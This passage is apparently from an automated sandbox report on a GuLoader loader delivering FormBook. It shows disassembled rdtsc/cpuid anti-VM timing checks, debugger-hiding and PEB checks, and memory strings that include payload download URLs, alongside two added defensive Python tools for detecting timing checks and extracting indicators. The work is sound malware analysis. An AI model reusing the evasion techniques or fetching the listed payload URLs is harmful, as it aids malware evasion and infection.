eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A77CE second address: 00000000022A77CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34BDCE6Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34BDD441h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34BDCF8Bh 0x0000003d lfence 0x00000040 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A47EF second address: 00000000022A480D instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ebx, 17707658h 0x00000009 sub ebx, D3E79B27h 0x0000000f push ebx 0x00000010 test ecx, ecx 0x00000012 mov ebx, dword ptr [ebp+000001F3h] 0x00000018 pushad 0x00000019 mov ebx, 000000A4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A480D second address: 00000000022A4843 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 nop 0x00000004 push A346122Fh 0x00000009 add dword ptr [esp], 1CC77B86h 0x00000010 xor dword ptr [esp], D8053D6Bh 0x00000017 cmp dx, bx 0x0000001a add dword ptr [esp], E7F74F24h 0x00000021 cmp al, cl 0x00000023 mov eax, ebp 0x00000025 add eax, 00000100h 0x0000002a mov dword ptr [eax], 05D9D0D6h 0x00000030 pushad 0x00000031 mov esi, 00000061h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 000000000056790A second address: 00000000005679F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34BDD30Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34BDD2D4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000005677CE second address: 00000000005677CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34D2B39Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34D2B971h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34D2B4BBh 0x0000003d lfence 0x00000040 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000562B1D second address: 0000000000562B73 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], E6F9D83Bh 0x0000000a test ch, dh 0x0000000c xor dword ptr [esp], A6CD49A4h 0x00000013 cmp cx, cx 0x00000016 mov eax, dword ptr [ebp+20h] 0x00000019 add eax, ebx 0x0000001b mov dword ptr [ebp+000001F5h], ecx 0x00000021 mov ecx, eax 0x00000023 push ecx 0x00000024 mov ecx, dword ptr [ebp+000001F5h] 0x0000002a pushad 0x0000002b mov ah, 76h 0x0000002d cmp ah, 00000076h 0x00000030 jne 00007EFE34BDE24Fh 0x00000036 popad 0x00000037 cmp ah, bh 0x00000039 mov dword ptr [ebp+0000027Ah], ebx 0x0000003f test edx, ecx 0x00000041 mov ebx, esi 0x00000043 push ebx 0x00000044 test esi, 05CEFCD7h 0x0000004a mov ebx, dword ptr [ebp+0000027Ah] 0x00000050 pushad 0x00000051 mov ebx, 000000D7h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000C298E4 second address: 0000000000C298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000C29B4E second address: 0000000000C29B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
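The interceptor listings under "Detected RDTSC dummy instruction sequence" and under "Tries to detect virtualization through RDTSC time measurements" show the two shapes of timing check in this sample: the GuLoader stub brackets a leaf-1 cpuid (mov eax, 1; cpuid) with two rdtsc reads, often serialised with lfence, so that the cost of the VM exit cpuid forces under a hypervisor shows up in the delta; the FormBook payload at 004098E4 (and at C298E4 in the hollowed chkdsk.exe) uses a bare rdtsc pair. The following scanner is an added example for this report, not Joe Sandbox code and not code from the sample: it reproduces the interceptor's "first address / second address" view from raw code bytes so the same evidence can be pulled from a memory dump offline, and it tells the cpuid-bracketed form apart from the plain rdtsc delta. The test buffer is constructed from the report's own listings (the byte encodings follow from the instruction offsets the report prints); the filler bytes and the base address are assumptions chosen so the first pair lands at 022A78FC..022A790A.

```python
"""Byte-pattern triage for the rdtsc/cpuid timing checks listed above.

Added example for this report (not Joe Sandbox code, not code from the sample).
"""
from dataclasses import dataclass
from typing import List

RDTSC = b"\x0f\x31"
CPUID = b"\x0f\xa2"
MOV_EAX_1 = b"\xb8\x01\x00\x00\x00"   # mov eax, 1: cpuid leaf 1 (ecx bit 31 is the hypervisor-present bit)
LFENCE = b"\x0f\xae\xe8"              # serialises the rdtsc reads, as in the GuLoader listings


@dataclass
class TimingPair:
    first: int            # address of the first rdtsc
    second: int           # address of the second rdtsc
    cpuid_between: bool   # a cpuid sits between the two reads (VM-exit timing)
    leaf1_cpuid: bool     # that cpuid was immediately preceded by mov eax, 1
    serialised: bool      # an lfence appears between the reads


def find_rdtsc_pairs(code: bytes, base: int = 0, window: int = 512) -> List[TimingPair]:
    """Pair each rdtsc with the next one within `window` bytes, as the interceptor does.

    Pure byte matching: 0F 31 inside an immediate or in data also matches, so treat
    hits as leads to confirm in a disassembler, not as proof by themselves.
    """
    offsets: List[int] = []
    pos = code.find(RDTSC)
    while pos != -1:
        offsets.append(pos)
        pos = code.find(RDTSC, pos + len(RDTSC))

    pairs: List[TimingPair] = []
    for a, b in zip(offsets, offsets[1:]):
        if b - a > window:
            continue
        between = code[a + len(RDTSC):b]
        cp = between.find(CPUID)
        pairs.append(TimingPair(
            first=base + a,
            second=base + b,
            cpuid_between=cp != -1,
            leaf1_cpuid=cp >= len(MOV_EAX_1) and between[cp - len(MOV_EAX_1):cp] == MOV_EAX_1,
            serialised=LFENCE in between,
        ))
    return pairs


def classify(pair: TimingPair) -> str:
    """Map a pair onto the two signature names this report uses."""
    if pair.cpuid_between:
        return "CPUID execution measurement"
    return "RDTSC time measurement"


# Constructed test buffer (not bytes carved from the sample). The two sequences are re-encoded
# from the report's listings: the GuLoader stub at 022A78FC..022A790A (rdtsc; mov eax,1; cpuid;
# popad; pushad; lfence; rdtsc) and the FormBook payload at 004098E4..004098EA (rdtsc; xor ecx,ecx;
# add ecx,eax; rdtsc). The 0x90/0xCC filler and the base address are assumptions.
SEQ_GULOADER = RDTSC + MOV_EAX_1 + CPUID + b"\x61" + b"\x60" + LFENCE + RDTSC
SEQ_FORMBOOK = RDTSC + b"\x31\xc9" + b"\x01\xc1" + RDTSC
SAMPLE_CODE = b"\x90" * 16 + SEQ_GULOADER + b"\xcc" * 600 + SEQ_FORMBOOK + b"\x90" * 8
SAMPLE_BASE = 0x022A78FC - 16


if __name__ == "__main__":
    for p in find_rdtsc_pairs(SAMPLE_CODE, base=SAMPLE_BASE):
        print(f"First address: {p.first:08X} second address: {p.second:08X} "
              f"{classify(p)} leaf1={p.leaf1_cpuid} lfence={p.serialised}")
```

The 512-byte window is sized from the listings above, where GuLoader places well over 0xA0 bytes of junk arithmetic between two reads; the FormBook pair is six bytes apart. Note that the listing at 022A77CE computes the cpuid leaf with sub/add arithmetic instead of a literal mov eax, 1, so for that variant the example reports cpuid_between without leaf1_cpuid.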
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 rdtsc 0_2_022A5852
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5236 Thread sleep count: 146 > 30
Source: C:\Windows\explorer.exe TID: 5236 Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156 Thread sleep count: 67 > 30
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156 Thread sleep time: -335000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.447365137.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: explorer.exe, 0000001D.00000000.462940046.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001D.00000000.447868275.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 0000001D.00000000.462987107.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information queried: ProcessInformation
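The decrypted string blobs quoted under "Tries to detect sandboxes and other dynamic analysis tools" and again in this section are where the report's C2 URLs come from: the dump of the first process (00000000) holds the QEMU guest-agent paths and the VB6 runtime reference (windir=\syswow64\msvbvm60.dll), while the dump of the second instance (00000012) additionally holds the two payload URLs, wininet.dll and the Trident user-agent used for the download. The strings are concatenated with no separator, so a generic URL regex would glue "bin_QVwEr224.bin" to "http://farmersschool.ge" and then to "wininet.dll". The extractor below is an added example for this report, not Joe Sandbox code and not code from the sample: it splits the blob using a vocabulary of the tokens this report shows next to the URLs (the next URL scheme, a known module name, or the user-agent), which is an assumption drawn from this page rather than a general rule. The two blobs are copied from the memory-string lines above.

```python
"""IOC extraction from GuLoader's concatenated string blobs quoted in this report.

Added example (not Joe Sandbox code, not the sample's code).
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Module names present in the two blobs (assumption: used as URL terminators and reported as hints).
KNOWN_MODULES = ("ntdll", "kernel32", "user32", "shell32", "advapi32",
                 "msi.dll", "wininet.dll", "msvbvm60.dll")
_TERMINATORS = "|".join(re.escape(m) for m in KNOWN_MODULES)
URL_RE = re.compile(r"https?://.+?(?=https?://|" + _TERMINATORS + r"|Mozilla/|$)", re.IGNORECASE)
PATH_RE = re.compile(r"[A-Za-z]:\\.+?\.exe", re.IGNORECASE)
UA_RE = re.compile(r"Mozilla/[\d.]+ \(.*?\)(?: like Gecko)?")


def extract_iocs(blob: str) -> Dict[str, object]:
    """Pull URLs, hosts, executable paths, user-agent and module hints out of one blob."""
    urls: List[str] = [m.group(0) for m in URL_RE.finditer(blob)]
    hosts: List[Optional[str]] = [urlparse(u).hostname for u in urls]
    paths: List[str] = PATH_RE.findall(blob)
    ua = UA_RE.search(blob)
    lower = blob.lower()
    modules = [m for m in KNOWN_MODULES if m in lower]
    return {"urls": urls, "hosts": hosts, "paths": paths,
            "user_agent": ua.group(0) if ua else None, "modules": modules}


# Copied from the report's memory-string lines for process 00000000 and process 00000012.
BLOB_PROCESS_0 = (r"ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exe"
                  r"Msi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll")
BLOB_PROCESS_18 = (r"ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exe"
                   r"Msi.dllPublishershell32advapi32TEMP=https://kinmirai.org/wp-content/bin_QVwEr224.bin"
                   r"http://farmersschool.ge/bin_QVwEr224.binwininet.dll"
                   r"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")


if __name__ == "__main__":
    for label, blob in (("process 0", BLOB_PROCESS_0), ("process 0x12", BLOB_PROCESS_18)):
        print(label, extract_iocs(blob))
```

The split rule is deliberately narrow: any URL that happened to contain one of the vocabulary tokens would be truncated, so when a new GuLoader blob shows different neighbours, extend KNOWN_MODULES from that report rather than relaxing the lookahead.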

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 Start: 022A4BE7 End: 022A480D 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E Start: 022A4BE7 End: 022A480D 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 Start: 022A4BE7 End: 022A480D 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F Start: 022A4BE7 End: 022A480D 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 Start: 022A4BE7 End: 022A480D 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 Start: 022A4BE7 End: 022A480D 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 Start: 022A5BED End: 022A480D 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 Start: 022A4BE7 End: 022A480D 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 Start: 022A4BE7 End: 022A480D 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E Start: 022A4BE7 End: 022A480D 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 Start: 022A4BE7 End: 022A480D 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 Start: 022A4BE7 End: 022A480D 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 Start: 022A4BE7 End: 022A480D 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 Start: 022A4BE7 End: 022A480D 0_2_022A7488
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 rdtsc 0_2_022A5852
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A6320 LdrInitializeThunk, 0_2_022A6320
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5201 mov eax, dword ptr fs:[00000030h] 0_2_022A5201
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7365 mov eax, dword ptr fs:[00000030h] 0_2_022A7365
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 mov eax, dword ptr fs:[00000030h] 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33EC mov eax, dword ptr fs:[00000030h] 0_2_022A33EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 mov eax, dword ptr fs:[00000030h] 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7EFC mov eax, dword ptr fs:[00000030h] 0_2_022A7EFC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A348A mov eax, dword ptr fs:[00000030h] 0_2_022A348A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A6D92 mov eax, dword ptr fs:[00000030h] 0_2_022A6D92
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h] 18_2_1E47AE44
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h] 18_2_1E47AE44
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47EA55 mov eax, dword ptr fs:[00000030h] 18_2_1E47EA55
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E444257 mov eax, dword ptr fs:[00000030h] 18_2_1E444257
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h] 18_2_1E3F4A2C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h] 18_2_1E3F4A2C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BE620 mov eax, dword ptr fs:[00000030h] 18_2_1E3BE620
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D3A1C mov eax, dword ptr fs:[00000030h] 18_2_1E3D3A1C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h] 18_2_1E3EA61C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h] 18_2_1E3EA61C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h] 18_2_1E46B260
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h] 18_2_1E46B260
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488A62 mov eax, dword ptr fs:[00000030h] 18_2_1E488A62
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov ecx, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h] 18_2_1E3B5210
